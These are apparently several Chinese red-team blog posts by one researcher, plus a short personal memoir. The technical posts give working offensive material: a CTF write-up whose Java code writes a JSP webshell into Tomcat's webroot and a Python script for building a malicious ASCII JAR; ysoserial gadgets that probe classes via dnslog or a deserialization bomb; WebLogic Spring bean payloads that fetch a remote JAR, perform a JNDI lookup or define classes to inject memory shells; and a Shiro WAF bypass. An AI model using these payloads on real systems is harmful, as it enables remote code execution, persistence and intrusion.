        FileOutputStream fos = new FileOutputStream("/opt/tomcat/webapps/ROOT/shell.jsp");
        fos.write(shell.getBytes());
        fos.close();
    }
    // 防止后续tomcat编译jsp报错
    @Override
    public String convertString(Class c, String s, String attrName, Class propEditorClass, boolean isNamedAttribute) {
        return new StringInterpreterFactory.DefaultStringInterpreter().convertString(c,s,attrName,propEditorClass,isNamedAttribute);
    }
}

使用上面作为模版代码，编写python脚本不断向paddingData字段填充垃圾数据，然后javac编译，最后计算class文件压缩之后是否符合条件。

#!/usr/bin/env python
# autor: c0ny1
# date 2022-02-13
from __future__ import print_function
import time
import os
from compress import *
allow_bytes = []
disallowed_bytes = [38,60,39,62,34,40,41] # &<'>"()
for b in range(0,128): # ASCII
    if b in disallowed_bytes:
        continue
    allow_bytes.append(b)
if __name__ == '__main__':
    padding_char = 'A' # 填充的字符
    raw_filename = 'Exploit.class' # 原文件名
    zip_entity_filename = 'Exploit.class' # 压缩文件名
    jar_filename = 'ascii01.jar' # 保存文件名
    num = 1
    while True:
        # step1 动态生成java代码并编译
        javaCode = """
                java模版代码
                """
        padding_data = padding_char * num
        javaCode = javaCode.replace("{PADDING_DATA}", padding_data)
        f = open('Exploit.java', 'w')
        f.write(javaCode)
        f.close()
        time.sleep(0.1)
        os.system("javac -nowarn -g:none -source 1.5 -target 1.5 -cp jasper.jar Exploit.java")
        time.sleep(0.1)
        # step02 计算压缩之后的各个部分是否在允许的ASCII范围
        raw_data = bytearray(open(raw_filename, 'rb').read())
        compressor = ASCIICompressor(bytearray(allow_bytes))
        compressed_data = compressor.compress(raw_data)[0]
        crc = zlib.crc32(raw_data) % pow(2, 32)
        st_crc = struct.pack(', crc)
        st_raw_data = struct.pack(', len(raw_data) % pow(2, 32))
        st_compressed_data = struct.pack(', len(compressed_data) % pow(2, 32))
        st_cdzf = struct.pack(', len(compressed_data) + len(zip_entity_filename) + 0x1e)
        b_crc = isAllowBytes(st_crc, allow_bytes)
        b_raw_data = isAllowBytes(st_raw_data, allow_bytes)
        b_compressed_data = isAllowBytes(st_compressed_data, allow_bytes)
        b_cdzf = isAllowBytes(st_cdzf, allow_bytes)
        # step03 判断各个部分是否符在允许字节范围
        if b_crc and b_raw_data and b_compressed_data and b_cdzf:
            print('[+] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(b_crc, b_raw_data, b_compressed_data, b_cdzf, num, padding_char))
            # step04 保存最终ascii jar
            output = open(jar_filename, 'wb')
            output.write(wrap_jar(raw_data,compressed_data, zip_entity_filename.encode()))
            print('[+] Generate {0} success'.format(jar_filename))
            break
        else:
            print('[-] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(b_crc, b_raw_data,
                                                                                       b_compressed_data, b_cdzf, num,
                                                                                       padding_char))
        num = num + 1

我这边的编译环境是填充了248个A就满足要求了。

➜ ascii-jar git:(master) ✗ python3 ascii-jar-1.py
[-] CRC:False RDL:False CDL:True CDAFL:False Padding data: 1*A
[-] CRC:False RDL:False CDL:True CDAFL:False Padding data: 2*A
[-] CRC:False RDL:False CDL:True CDAFL:False Padding data: 3*A
......
[-] CRC:False RDL:True CDL:True CDAFL:True Padding data: 247*A
[+] CRC:True RDL:True CDL:True CDAFL:True Padding data: 248*A
[+] Generate ascii01.jar success

0x03

前后脏数据的处理

zip格式的文件都是支持前后加脏数据的，不过加脏数据之后需要修复下各类offset。可以使用zip命令进行修复,为了省事，这里我直接使用phith0n师傅的PaddingZip项目来修复。

$ python3 paddingzip.py -i ascii01.jar -o payload.jar -p "DIRTY DATA AT THE BEGINNING " -a "C0NY1 DIRTY DATA AT THE END"
file 'payload.jar' is generated

可能你会有疑问，为啥末尾的脏数据是C0NY1 + DIRTY DATA AT THE END。这是因为题目的代码,在获取参数时进行了trim操作。

trim操作会将字符串首尾小于或等于\u0020的字符清理掉，而正常的zip文件末尾都是00等空字节结尾的，这会导致末尾数据丢失。

// java.lang.String#trim
public String trim() {
    int len = value.length;
    int st = 0;
    char[] val = value;    /* avoid getfield opcode */
    while ((st < len) && (val[st] <= ' ')) {
        st++;
    }
    while ((st < len) && (val[len - 1] <= ' ')) {
        len--;
    }
    return ((st > 0) || (len < value.length)) ? substring(st, len) : this;
}

为了解决这个问题，我们需要一个大于\u0020的字符插入结尾，比如C0NY1。

修改offset之后，使用hex编辑器把jar + C0NY1的数据抠出来就是最终要提交的payload了。

构造META-INF/resources/shell.jsp类型的ascii-jar更加简单，感兴趣的直接参考我github项目ascii-jar当中ascii-jar-2.py的代码。

最后的利用步骤官方Writeup讲的很清楚，这里就不赘述了。

0x04

总结

综合来看WreckTheLine战队的解法，我认为是最好的，两个步骤直接搞定。官方writeup写入非法jar，业务重启会崩溃。Sauercloud战队使用的org.apache.jasper.compiler.StringInterpreter并不能通杀tomcat。

最后感谢作者提供了这么好的一道ctf题，一道好题就像是一部不错的悬疑片，环环相扣耐人寻味。哪怕是解决之后脑海里依然在思考这些trick在实战中的意义，比如jar中的META-INF/resources/目录是不是可以用来做权限维持？

0x05

参考资料

* RWCTF 4th Desperate Cat Writeup

* https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html

* https://github.com/molnarg/ascii-zip

* https://github.com/Arusekk/ascii-zip

* https://github.com/phith0n/PaddingZip

0x06

招聘：红队武器化工程师

最后给团队(奇安信观星实验室)招个队友,有意向的可以公众号后台或者邮箱root#gv7.me联系我，期待与你共事。

6.1 工作内容

学习最前沿的攻防技术，挖掘0day，并将研究成果自动化武器化。

6.2 能力要求

可以分析调试最新报送的漏洞
可以将研究成果自动化武器化

6.3 加分项

有高质量文章blog
有不错的自动化开源作品
有原创CVE

阅读原文

跳转微信打开

忆魁兄

Thu, 20 Jan 2022 12:00:00 +0800

原创 c0ny1 2022-01-20 12:00

飞雪窗边过，故人心上来

早上起来做早餐，发现窗外的北京城下起了鹅毛大雪。让我突然想起大学一个“有味道”的人以及他的事。真是飞雪窗边过，故人心上来。下文是大学时写的与他的记忆，且仅有此篇，毕业后也再没他的消息。

魁兄，小我一届，爱诗喜酒嗜编程，是我目前认识的最有才情的程序猿。原先虽然同处一个工作室，然生活并无交集。

真正认识是在一年冬天的夜晚，工作室三大学霸因获得奖学金而请通宵唱歌，而我和他正好在邀请之列。

麦霸们开始争相在点播机前点歌，酒鬼们也用他们坚硬的牙齿翘开一瓶又一瓶黄河啤酒，“烟筒”们自然也没有闲着嘴，叼着黑兰州并互相给对方点火，不时吐出一抹白烟，缭绕在空气中。我就穿梭在这些之间，乐此不彼。

魁兄到是不识人间烟火，手里握着还没拧开口的白酒，安静的坐在一个被人遗忘的角落，不说话。脸上平静而祥和，到是有点像暮年的老者看着一群年轻人狂欢的寂寞。ktv红红绿绿的灯光，和他似乎有些格格不入。我以为没人跟他说话，于是跟工作室其他男男女女寒暄几番之后。我把酒杯藏在身后向他走去，他身边的学弟们也识趣地给我让出一个位置~

我：“魁兄，你的酒杯呢？”

我瞟了他一眼

他淡淡说到：“啤酒不醉人，又不暖心，不喜”。

我看了看天花板，叹气道：“那咱来一个冬天的白酒”。

他：“甚好”

⋯⋯⋯⋯

我们就这样，在红男绿女的狂欢之中，在杯觥交错之间聊起编程，聊起C语言，python，Linux，还聊起了他的诗和故事。其实平生也是第一次在KTV里讨论编程知识，感觉是有点怪怪，不过相谈甚欢。聊天具体的内容我也不太记得了。只记得那个冬天，一杯白酒温暖了整个夜晚⋯⋯

时间回到了前天夜里，我照常在学院看书，他突然发消息给我说来取他的诗集，我欣喜不已去他宿舍。他做在窗台边，背景是无尽的夜色。

他平静的说：现在也写不出诗了，我整理了一些能看的凑成一本小册子，你们将就着看吧！

我：为何写不出？

他打开窗户，外面的雪飘了进来，划过他的臂膀。他背对我说：没感觉了，或许编程太多，或许环境变了，或许我也不知道为何。

我默不作声，走到门口。

我：魁兄既有雪夜赠书之意，我亦有勾句还汝之情。

魁兄也不做声，笑的像个孩子一样，甚是可爱

阅读原文

跳转微信打开

构造java探测class反序列化gadget

Fri, 31 Dec 2021 14:26:00 +0800

原创 c0ny1 2021-12-31 14:26

给你一颗死磕反序列化漏洞的定心丸

0x01

背景

你是否遇到过这样的情况，黑盒环境下有一个序列化入口。你将ysoserial所有gadget的测试了一遍，均无法RCE。由于没有报错信息，你根本无法确定是下面那个原因导致。

1. 没有gadget依赖的jar

2. suid不一致

3. jar版本不在漏洞版本

4. gadget使用的class进入了黑名单

5. ......

单纯的盲测，工作量将非常大。如果我们有一个通用的探测某个class是否存在的gadget，这些问题将很好解决！

0x02

解决serialVersionUID冲突问题

在构造之前我们先思考一个问题，Java原生反序列化是会检测serialVersionUID的。当我们本地序列化Class和服务器上的Class SUID不一样的时候，哪怕是真实存在这个类，我们也无法探测成功。涉及这一块检测在JDK如下方法中。

// java.io.ObjectStreamClass#initNonProxy
void initNonProxy(ObjectStreamClass model,
                      Class cl,
                      ClassNotFoundException resolveEx,
                      ObjectStreamClass superDesc)
throws InvalidClassException{
    // model是基于序列化数据构造的ObjectStreamClass对象
    suid = Long.valueOf(model.getSerialVersionUID());
    serializable = model.serializable;
    externalizable = model.externalizable;
    ......
    if (cl != null) {
        // 通过类名，基于当前运行环境构造的ObjectStreamClass
        localDesc = lookup(cl, true);
        ......
        // SUID检查条件：是否都或都没有实现了Serializable接口 && 不是数组类 && suid不相同
        if (serializable == localDesc.serializable &&
            !cl.isArray() &&
            suid.longValue() != localDesc.getSerialVersionUID())
        {
            throw new InvalidClassException(localDesc.name,
                "local class incompatible: " +
                "stream classdesc serialVersionUID = " + suid +
                ", local class serialVersionUID = " +
                localDesc.getSerialVersionUID());
        }
        ......
    }
    ......
}

我们不难判断出来如果要绕过serialVersionUID的检查就需要打破3个判断条件中的一个。这里我想到了2个方案进行绕过，假设我们要探测A类存不存在。

1. 动态生成一个A类不实现Serializable接口进行序列化。如果线上的A类是实现Serializable接口，第一个条件就不成立了直接绕过。如果线上的Class没有实现改接口，则两者suid都为0L,第三个条件不符合，自然无需检查。

2. 直接序列化A[].class，第二个条件直接不符合，直接不用检查SUID，无需关心实现实现Serializable接口。

这里我选择按照1的方式动态生成Class:

public static Class makeClass(String clazzName) throws Exception{
    ClassPool classPool = ClassPool.getDefault();
    CtClass ctClass = classPool.makeClass(clazzName);
    Class clazz = ctClass.toClass();
    ctClass.defrost();
    return clazz;
}

0x03

一次失败的构造

沿用之前的包裹大量脏数据绕WAF的思路来构造，发现LinkedList第一个元素反序列化失败并不会导致反序列化流程停止。

List a = new LinkedList();
a.add(makeClass("TargetClass"));
a.add(new URLDNS.getObject("http://test.dnslog.cn"));

通过Object属性也无法成功。第一个属性反序列化失败，第二个属性依然会被反序列化。

Class A {
 private Object a; // makeClass("TargetClass")
 private Object b; // new URLDNS.getObject("http://test.dnslog.cn")
}

调试后发现不存在class抛出的ClassNotFoundException异常,被try...catch了，并不能阻断java.io.ObjectInputStream#readObject内部流程，但是可以阻断其他可序列化类的readObject流程。也就是说需要通过ClassNotFoundException来阻断source到sink之间的通路，才能断链。

0x04

通过dnslog探测class

在一次午饭的时候和@NoPoint师傅交流，说到了可以改造URLDNS这个gadget探测class，我之前是在fastjson中使用过类似的思路。

重新分析了下URLDNS的调用链，发现可以在HashMap#readObject处阻断。当反序列化key-value时，如果value是一个不存在的Class的话，将会报错退出for循环，URL对象作为key将不会被putForCreate到hashcode方法触发dnslog。

// java.util.HashMap#readObject
private void readObject(java.io.ObjectInputStream s)
         throws IOException, ClassNotFoundException
    {
    ......
    // Read the keys and values, and put the mappings in the HashMap
    for (int i=0; i      // 序列化要探测的Class
        K key = (K) s.readObject();
        // 反序列化URL对象
        V value = (V) s.readObject();
        putForCreate(key, value);
    }
}

最终gadget构造如下:

@Authors({ Authors.NOPOINT,Authors.C0NY1 })
public class FindClassByDNS implements ObjectPayload<Object> {
        public Object getObject(final String command) throws Exception {
            String[] cmds = command.split("\\|");
            if(cmds.length != 2){
                System.out.println("|");
                return null;
            }
            String url = cmds[0];
            String clazzName = cmds[1];
            URLStreamHandler handler = new SilentURLStreamHandler();
            HashMap ht = new HashMap();
            URL u = new URL(null, url, handler);
            // 以URL对象为key，以探测Class为value
            ht.put(u, makeClass(clazzName));
            Reflections.setFieldValue(u, "hashCode", -1);
            return ht;
        }
}

java -jar ysoserial-for-woodpecker.jar -g FindClassByDNS -a "http://oc.mfpy4t.dnslog.cn|org.apache.commons.collections.map.LazyMap

0x05

通过反序列化炸弹探测class

有些环境可能没有配置DNS服务，这个时候就无法使用上面的gadget来探测。为了应对这个场景，我第一时间想到的就是改造JRMPClient。但是看了下调用链中的class没有Object类型的属性，没法断链。于是只能去挖掘新gadget，后面大约花了一周时间也没有成果。加之有其他事情，构造的事就搁浅了一段时间。直到无意间拜读@fnmsd师父的文章,看到了@Joshua Bloch的《effective java》，瞬间来了灵感。

里面给出了一个反序列化炸弹的技巧，通过构造特殊的多层嵌套HashSet，导致服务器反序列化的时间复杂度提升，消耗服务器所有性能，导致拒绝服务。在这个基础上，我选择消耗部分性能达到间接延时的作用，来探测class。

@Authors({ Authors.C0NY1 })
public class FindClassByBomb extends PayloadRunner implements ObjectPayload<Object> {
    public Object getObject ( final String command ) throws Exception {
        int depth;
        String className = null;
        if(command.contains("|")){
            String[] x = command.split("\\|");
            className = x[0];
            depth = Integer.valueOf(x[1]);
        }else{
            className = command;
            depth = 28;
        }
        Class findClazz = makeClass(className);
        Set root = new HashSet();
        Set s1 = root;
        Set s2 = new HashSet();
        for (int i = 0; i < depth; i++) {
            Set t1 = new HashSet();
            Set t2 = new HashSet();
            t1.add(findClazz);
            s1.add(t1);
            s1.add(t2);
            s2.add(t1);
            s2.add(t2);
            s1 = t1;
            s2 = t2;
        }
        return root;
    }
}

由于每个服务器的性能不一样，要想让它们延时时间相同，就需要调整反序列化炸弹的深度。所以在使用该gadget时，要先测试出深度，一般最好调整到比正常请求慢10秒以上。经过我的实战一般这个深度都在25到28之间，切记不要设置太大否则造成DOS。

我们来看下效果。InvokerTransformer类存在，延时25s。

 java -jar ysoserial-for-woodpecker.jar -g FindClassByBomb -a "org.apache.commons.collections.functors.InvokerTransformer|28"

InvokerTransformer666类不存在，不延时。

0x06

配合class checklist食用

要想在实战中使用，我们就需要事先去制作一份class的checklist备用。下面我通过diff maven中央仓库的统计的结果。最新的checklist和gadget都更新到ysoserial-for-woodpecker项目。

6.1 CommonsCollections

必须存在类：org.apache.commons.collections.functors.ChainedTransformer

版本范围	漏洞版本	判断类	suid冲突
>= 3.1 or = 20040616	org.apache.commons.collections.list.TreeList	是	无
>= 3.2.2	org.apache.commons.collections.functors.FunctorUtils$1	否	无

6.2 CommonsCollections4

必须存在类：org.apache.commons.collections4.comparators.TransformingComparator

版本范围	漏洞版本	判断类	suid冲突
>= 4.1	否	存在org.apache.commons.collections4.FluentIterable	无
4.0	否	不存在org.apache.commons.collections4.FluentIterable	无

6.3 CommonsBeanutils

必须存在类：org.apache.commons.beanutils.BeanComparator

版本范围	漏洞版本	判断类	suid冲突
>= 1.9.0	是	存在org.apache.commons.beanutils.BeanIntrospector	-2044202215314119608
1.7.0 <= <= 1.8.3	是	存在org.apache.commons.collections.Buffer	-3490850999041592962
>= 1.6 or = 20030211.134440	是	存在org.apache.commons.beanutils.ConstructorUtils	2573799559215537819
>= 1.5 or 20021128.082114 > 1.4.1	是	存在org.apache.commons.beanutils.BeanComparator	5123381023979609048

6.4 c3p0

必须存在：org.apache.commons.beanutils.BeanComparator

版本范围	漏洞版本	判断类	suid冲突
0.9.5-pre9 ～ 0.9.5.5	是	存在com.mchange.v2.c3p0.test.AlwaysFailDataSource	-2440162180985815128
0.9.2-pre2-RELEASE ~ 0.9.5-pre8	是	不存在com.mchange.v2.c3p0.test.AlwaysFailDataSource	7387108436934414104

以c3p0为例子，我们判断的步骤应该是

1. 第一步判断com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase是否存在，若存在C3P0可用

2. 第二步判断com.mchange.v2.c3p0.test.AlwaysFailDataSource是否存在，存在说明是高版本，suid切换-2440162180985815128。否则切换7387108436934414104

0x07

最后的思考

有了类探测当然不只可以做排查gadget可用性问题，只要你维护出一个不错的class checklist。如下信息都可以判断：

1. Oracle jdk or Open jdk

2. 是jre还是jdk

3. 中间件类型（辅助构造回显/内存马）

4. 使用的web框架

5. BCEL classloader是否存在

6. 判断java版本是否低于<7u104（该版本可以00截断）

7. ......

其他类型的反序列化gadget也是一样的思路,小tips是否可以变成利器，看挥舞它的人。

0x08

参考文章

0x09

招聘：红队武器化工程师

最后给团队(奇安信观星实验室)招个队友,有意向的可以公众号后台或者邮箱root#gv7.me联系我，期待与你共事。

9.1 工作内容

学习最前沿的攻防技术，挖掘0day，并将研究成果自动化武器化。

9.2 能力要求

可以分析调试最新报送的漏洞
可以将研究成果自动化武器化

9.3 加分项

有高质量文章blog
有不错的自动化开源作品
有原创CVE

阅读原文

跳转微信打开

weblogic下spring bean RCE的一些拓展

Mon, 11 Oct 2021 12:00:00 +0800

原创 c0ny1 2021-10-11 12:00

spring bean rce payload构造之旅

0x00

背景

有一次通过CVE-2020-14882漏洞打了一台Windows上的weblogic 10.3.6.0，服务器上有杀软。由于公开的如下spring bean payload只能执行命令，拿权限很困难。

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmdvalue>
        <value>/cvalue>
        <value>value>
      list>
    constructor-arg>
  bean>
beans>

只能思考如何构造可以执行任意代码的spring bean xml来一键注入内存马了。

weblogic下spring bean执行任意代码的主要困局是weblogic下的spring不支持spel表达式，导致我们无法通过spel表达式来执行任意代码来。

同时这里顺便提一嘴，个人认为好的payload应该有以下3个特点。

1. 兼容性高

2. 利用复杂度低

3. 简洁体积小

接下来将以这几点要求，分享下构造该系列payload的过程，这也是我在编写woodpecker利用插件时经常经历的过程与思考。

0x01

init-method系列payload

目前公开的payload是将恶意数据传入构成函数，然后通过init-method来调用一个无参数构造方法来触发。按照这个条件，我找到了两个可以执行代码的class。

1.2 UnitOfWorkChangeSet

在weblogic 10.3.6.0版本有一个oracle.toplink.internal.sessions.UnitOfWorkChangeSet类，构造函数可以直接触发反序列化。


<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="oracle.toplink.internal.sessions.UnitOfWorkChangeSet">
        <constructor-arg>
            <list>
                
                <value type="byte">-84value>
                <value type="byte">-19value>
                <value type="byte">0value>
                <value type="byte">5value>
                ......
            list>
        constructor-arg>
    bean>
beans>

但是这个payload需要有gadget才能任意代码执行，显然不是很完美。

1.2 XmlDecoder

在使用XMLDecoder反序列化时，我们是将xml序列化内容以流的形式传入构造函数，然后再调用readObject无参构造方法进行反序列化。所以我们我们完全可以通过XMLDecoder反序列化执行becl代码来实现任意代码执行。

String xml = "$$BCEL$$$l$8b......";
ByteArrayInputStream inputStream = new ByteArrayInputStream(xml.getBytes());
XMLDecoder xmlDecoder = new XMLDecoder(inputStream);
xmlDecoder.readObject();

把上面代码转成spring bean如下：


<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.beans.XMLDecoder" init-method="readObject">
        <constructor-arg>
            <bean id="x" class="java.io.ByteArrayInputStream" >
                <constructor-arg>
                    <list>
                        
                        <value type="byte">60value>
                        <value type="byte">106value>
                        <value type="byte">97value>
                        <value type="byte">118value>
                        <value type="byte">97value>
                        <value type="byte">62value>
                        ......
                    list>
                constructor-arg>
            bean>
        constructor-arg>
    bean>
beans>

这个payload看着确实要通用很多，但是体积太大了，注入一个内存马的xml要六百多k。在本地没有问题，但在实战环境上没有成功，当时感觉可能是体积太大的问题。所以只能思考如何减少体积。

0x02

factory-method系列payload

后来发现通过init-method来构造payload，限制有点多，人工找class成本有点大。摆在我面前的有两条路

1. 编写gadgetinspector规则挖掘符合条件的class

2. 再翻翻官方文档，看看有没有可能直接调用有参数方法。

很显然挖链成本高一些，于是我打算先走第二条路，走不通就只能死磕第一条路了。在看官方文档时,我着重关注如下涉及方法调用的标签和属性。

标签/属性	分析
	调用构造器
	创建bean时，可调setter方法
init-method	bean初始化时，可以调用一个无参方法
destroy-method	bean被销毁时，可以调用一个无参方法
lookup-method	可以控制返回结果，但是weblogic没有cglib库,这个标签没发用
replace-method	任意方法替换，可以替换某些方法的实现逻辑为另一个方法，但是xml无法定义替换逻辑
factory-method	通过调用工厂方法创建bean，可调用返回值不为void的有参方法，静态和非静态都可以

很显然factory-method非常符合我们的要求,构造起payload就轻松多了。

2.1 jndi


<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean class="javax.naming.InitialContext" factory-method="doLookup">
        <constructor-arg type="java.lang.String" value="ldap://127.0.0.1:1664/exp"/>
    bean>
beans>

jndi有jdk版本限制，so继续优化。

2.2 loadjar


<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="classLoader" class="java.net.URLClassLoader" >
        <constructor-arg>
            <list>
                <value type="java.net.URL">http://127.0.0.1:1664/exp.jarvalue>
            list>
        constructor-arg>
    bean>
    <bean id="clazz" factory-bean="classLoader" factory-method="loadClass">
        <constructor-arg type="java.lang.String" value="InjectMemshell"/>
    bean>
    <bean factory-bean="clazz" factory-method="newInstance">
    bean>
beans>

加载class要通用很多，只是需要搭一个http服务比较繁琐，利用上不是很方便，so继续优化。

2.3 bcel

new com.sun.org.apache.bcel.internal.util.ClassLoader().loadClass("$$BCEL$$$...").newInstance();

代码转换为spring bean:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd ">
    <bean id="classloader" class="com.sun.org.apache.bcel.internal.util.ClassLoader"/>
    <bean id="clazz" factory-bean="classloader" factory-method="loadClass">
        <constructor-arg type="java.lang.String" value="$$BCEL$$$......"/>
    bean>
    <bean factory-bean="clazz" factory-method="newInstance">
    bean>
beans>

有的JDK版本bcel被去掉了，so还得继续构造。

2.4 java.lang.ClassLoader#defineClass

java下执行代码要说兼容性最好，当然还得是java.lang.ClassLoader#defineClass。接下来只需要思考如何把下面的代码，用sprng bean来表达即可。

byte[] clazzBytes = new byte[]{-54,-2,-70,-66,0,......};
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class)defineClass.invoke(new MLet(),clazzBytes,0,clazzBytes.length);
clazz.newInstance();

通过研究发现一个小细节，spring bean可以调用私有方法无需反射。这就很方便了，可以直接调用当前class及其所有父类的方法。

构造过程还遇到一个问题，使用标签存储class字节码导致payload要大很多。当然有的人会想的用weblogic.utils.Hex来编码，其实Base64编码体积更小。由于不同版本JDK下Base64 api有变化，为了通用我打算去weblogic下找，并着重考虑weblogic.*包名下的。最后找到了如下两个，不过1没有被当前classloader加载，只能选择2。

1. weblogic.servlet.utils.Base64

2. weblogic.utils.encoders.BASE64Decoder

最终优化如下，大概就是目前我觉得最好的payload了。如果你有更好的payload欢迎留言交流。

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd ">
    <bean id="decoder" class="weblogic.utils.encoders.BASE64Decoder"/>
    <bean id="clazzBytes" factory-bean="decoder" factory-method="decodeBuffer">
        <constructor-arg type="java.lang.String" value="yv66vgAAA......"/>
    bean>
    <bean id="classLoader" class="javax.management.loading.MLet"/>
    <bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
        <constructor-arg type="[B" ref="clazzBytes"/>
        <constructor-arg type="int" value="0"/>
        <constructor-arg type="int" value="10692"/>
    bean>
    <bean factory-bean="clazz" factory-method="newInstance"/>
beans>

顺便写一个woodpecker插件留以后备用，美如画。

0x03

参考文章

1.https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#beans-dependencies

2.https://www.cnblogs.com/happyflyingpig/p/8047441.html

阅读原文

跳转微信打开

有一个gadget正在泄露你的ID

Tue, 14 Sep 2021 12:00:00 +0800

原创 c0ny1 2021-09-14 12:00

你的id正在在java反序列化漏洞中泄露

0x01

背景

在Java反序列化漏洞炙手可热的当下，许多自动化工具都在使用ysoserial的gadget。而这些gadget当中，有一个gadget正在偷偷泄露你的id --- BeanShell1

这意味着经常使用shiro批量爆破gadget工具的小伙伴，蓝队同学可能解密下payload就能得到你的id了。

0x02

定位信息泄露属性

通过使用java-object-searcher搜索，找到敏感信息存储在bsh.NameSpace类的variables属性中。

通过阅读该类代码，发现只有setTypedVariable方法对variables进行put操作，在该处下断点。

重新调式，看到当前运行路径被put进来后，顺着调用堆栈往上分析。发现BeanShell1在Interpreter对象初始化时，调用bsh.Interpreter#initRootSystemObject设置了bsh.cwd值为当前运行路径，最终它被保存到了序列化数据中。

0x03

构造干净的BeanShell1

既然Interpreter对象通过setu方法存储了敏感信息，那么我们同样可以调用该方法将敏感信息覆盖掉，防止信息泄露。

所以要构造一个干净的BeanShell1 gadget，只需要在Interpreter对象创建后反射调用setu方法覆盖bsh.cwd值为.(第13-15行代码)即可。

目前已经给ysoserial项目pr，等待官方修复。当然大家也可以使用我二次开发的ysoserial-for-woopecker。

阅读原文

跳转微信打开

通过加载class提高Neo-reGeorg兼容性

Mon, 06 Sep 2021 12:00:00 +0800

原创 c0ny1 2021-09-06 12:00

一种提升jsp脚本兼容性的通用方法

0x01

背景

一大早就看到L-codes师傅发消息说，Neo-reGeorg jsp服务端又出现问题了，印象里已经不是一两次了。大部分都是兼容性问题，这次也不例外。

是时候设计一个一劳永逸的方案了。

0x02

分析原因

我们知道jsp从被访问到运行，经历如下阶段。

本案例中发现tomcat work目录下已经存在了tunnel_jsp.java,但是没有tunnel_jsp.class，说明阶段1已经过。结合页面报错信息，在2阶段时Tomcat内置的编译器JDTCompiler，编译报错了。

检查tunnel_jsp.java代码并没有语法错误，尝试使用javac编译，编译成功！看来JDTCompiler与javac实现逻辑并不同，而且没有javac强大。

编译成功之后我再访问tunnel.jsp页面不再报错了。可见提高一个.jsp的兼容，无非就是让它在各个中间件下成功变成一个.class。而这个过程与具体中间件的jsp转换器的解析机制，java编译器的编译机制和servlet-api的版本息息相关。

那么我们是不是可以把Neo-reGeorg的服务端代码提取变成class字节码，然后jsp来加载和调用，来提高这个过程的成功率呢？。

总之核心思想就是把尽可能多的业务逻辑变成最终可运行的java字节码，同时尽可能的减少jsp代码，少用api少用语法糖少用特性。

0x03

编码实现

我们先来移植服务端模版代码为java代码。直接新建一个NeoreGeorg.java，将jsp中的方法直接copy,主体代码的移植需要注意2个问题。

第一、参数提炼问题。我们需要把模版变化的地方，提取出来作为参数，比如X-CMD这样的指令，POST request read filed这样的提示，Neo-reGorg需要通过随机替换它们实现流量加密。

第二、参数传递问题。参数可以通过构造方法或者自定义方法传递进来，但是这样要多写些反射代码。本着jsp代码越少越好原则，使用每个类都有的equal(java.lang.Object)方法。

为了兼容更多的jdk版本我们这里选择使用1.5编译，同时为了class体积更小，可以使用-g:none去掉调试信息。

jsp部分很简单，定义一个classloader用于加载class，然后将该class newInstance进行调用。有二个点可以简单讲讲。

第一，class字节码的存储方式问题。本着少用api的原则，我直接用byte数组存储。当然如果字节码太多，可能会有The code of method _jspService(...) is exceeding the 65535 bytes limit报错问题，推荐用hex编码解决。

第二，全局存储class对象问题。推荐使用application对象，而不是session对象进行存储，否则遇到负载的情况就麻烦了。

经过测试在各个中间件下稳定运行，顺手给L-codes师傅一个pr。

0x04

总结

其实这个方法可以使用很多jsp脚本的改造，比如内存马注入jsp，jsp大马，蚁剑一句话木马等等。大家可以照猫画虎，自行修改。

阅读原文

跳转微信打开

shiro反序列化绕WAF之未知HTTP请求方法

Mon, 30 Aug 2021 12:01:00 +0800

原创 c0ny1 2021-08-30 12:01

人性懒惰表现之一就是不防御未知

0x01

背景

当下WAF对shiro的防护，确实比较严格。对rememberMe的长度进行限制，甚至解密payload检查反序列化class。本周我遇到一个场景，就是这种情况。使用之前的方法rememberMe=加密payload+==垃圾数据也失败了，这个方法之前有大佬分享过，我就不再赘述了。我最终使用未知HTTP请求方法解决战斗。

0x02

过程

当时我的思考是shiro的payload在header上，如何修改request header可以导致waf解析不出来，但是后端中间件正常解析呢？

第一步，先构造出先绕WAF，哪怕改成不合法的数据包。

第二步，在绕WAF的数据包基础上修正，让后端中间件可以解析。

我把被拦截的包发送的repeater模块,尝试切换http版本，添加垃圾header头等等方法均没绕过。在修改GET方法为XXX这样的未知HTTP请求方法时,发现WAF不在拦截，但是后端报错了。

接下来验证下后端是否真正处理了rememberMe。我先请求去掉rememberMe，response对应的rememberMe消失了

然后再加上rememberMe,repseone的remeberMe又回来了。这说明后端正常处理rememberMe，这么绕WAF没问题！

最后将之前注入内存webshell的payload修改下请求方法，成功拿下Web权限。

0x03

原理

